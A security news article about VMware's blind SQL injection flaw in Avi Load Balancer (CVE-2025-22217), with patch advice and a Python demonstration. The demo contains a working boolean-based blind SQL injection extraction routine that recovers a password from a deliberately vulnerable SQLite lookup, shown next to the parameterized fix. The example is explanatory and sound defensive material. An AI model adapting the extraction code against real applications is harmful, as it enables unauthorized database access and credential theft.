
VMware Alert: High-Risk Blind SQL Injection Bug Identified in Avi Load Balancer


VMware has warned of a blind SQL injection flaw in its Avi Load Balancer that could let an attacker gain unauthorized access to the product's database. The vulnerability, tracked as CVE-2025-22217, carries a CVSS score of 8.6 out of 10, placing it in the high-severity range.

VMware describes the issue as an unauthenticated blind SQL injection: according to its advisory, a malicious user with network access could use specially crafted SQL queries to gain access to the database. "Blind" means the attacker never sees query output directly and instead infers data from how the application responds (for example, a true/false difference in the reply or in response timing), so the lack of an error message or echoed result does not make the flaw any less exploitable. Because there are no pre-patch workarounds, VMware urges enterprise administrators to apply the available patches promptly.
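To make concrete what "blind" means in this context, the following added Python example (written for this page; it is not VMware's code and does not represent the Avi Load Balancer's actual query path, which VMware has not published) shows a string-built lookup that leaks only a yes/no answer, how that single bit per request is enough to extract a stored value one character at a time, and the parameterized form that closes the hole. The `users` table, the names and the passwords are constructed sample data, and the database is an in-memory SQLite instance.

```python
import sqlite3

# Constructed sample data for the demonstration only (no real system).
SAMPLE_USERS = [("admin", "s3cretpass"), ("alice", "hunter2")]


def make_db():
    """Create an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def user_exists_vulnerable(conn, name):
    """Vulnerable pattern: the caller's string is spliced into the SQL text.

    The function returns only True/False, so nothing from the database is
    echoed back; that is exactly the 'blind' situation.
    """
    sql = f"SELECT 1 FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchone() is not None


def user_exists_safe(conn, name):
    """Hardened form: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT 1 FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchone() is not None


def boolean_blind_extract(oracle, target_user, max_len=32):
    """Recover target_user's password using only the True/False answer
    that `oracle(name_value)` gives back (boolean-based blind inference).

    Returns None if the oracle never answers True, i.e. injection failed.
    Each password character is found by binary search over printable ASCII,
    so about 7 requests per character plus the length probes.
    """
    # Step 1: find the length with a linear probe on length(password).
    length = None
    for n in range(1, max_len + 1):
        payload = f"{target_user}' AND length(password) = {n} -- "
        if oracle(payload):
            length = n
            break
    if length is None:
        return None

    # Step 2: binary-search each character's code point (SQLite unicode()).
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII; assumption for the sample data
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (f"{target_user}' AND unicode(substr(password, {pos}, 1))"
                       f" <= {mid} -- ")
            if oracle(payload):
                hi = mid
            else:
                lo = mid + 1
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    conn = make_db()
    leaked = boolean_blind_extract(
        lambda v: user_exists_vulnerable(conn, v), "admin")
    blocked = boolean_blind_extract(
        lambda v: user_exists_safe(conn, v), "admin")
    print("vulnerable lookup leaked:", leaked)   # s3cretpass
    print("parameterized lookup leaked:", blocked)  # None
```

The point of the example is that a yes/no response is a complete side channel: the attacker needs no error text and no data in the reply, only consistency. The same inference works against timing differences if the application's behaviour does not differ otherwise. The only robust fix is the one on the safe path, binding the untrusted value as a parameter so it can never change the query's structure; input filtering on its own is not a substitute, which is consistent with VMware offering no workaround and only a patch.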

The Avi Load Balancer distributes incoming traffic across servers and is widely used to keep cloud and on-premises applications performant and available. Beyond load balancing, the product provides web application security and container ingress for cloud and datacenter applications.

Designed to work with both traditional virtual machine-based applications and containerized microservices, the Avi Load Balancer has become an integral component of many IT infrastructures. VMware has advised customers running versions 30.1.1, 30.1.2, 30.2.1 and 30.2.2 to deploy the available patches without delay. Customers on 30.1.1, the oldest affected release, should upgrade to 30.1.2 before applying the patch.

With no workaround available, patching is the only effective remediation. The flaw was reported to VMware privately, and the company credits researchers Daniel Kukuczka and Mateusz Darda for the discovery.

This alert follows a series of other VMware security disclosures, including exploited vCenter Server flaws and high-severity SQL injection vulnerabilities in other products. Taken together, they underline why prompt patch management matters for infrastructure components that sit in front of production applications.
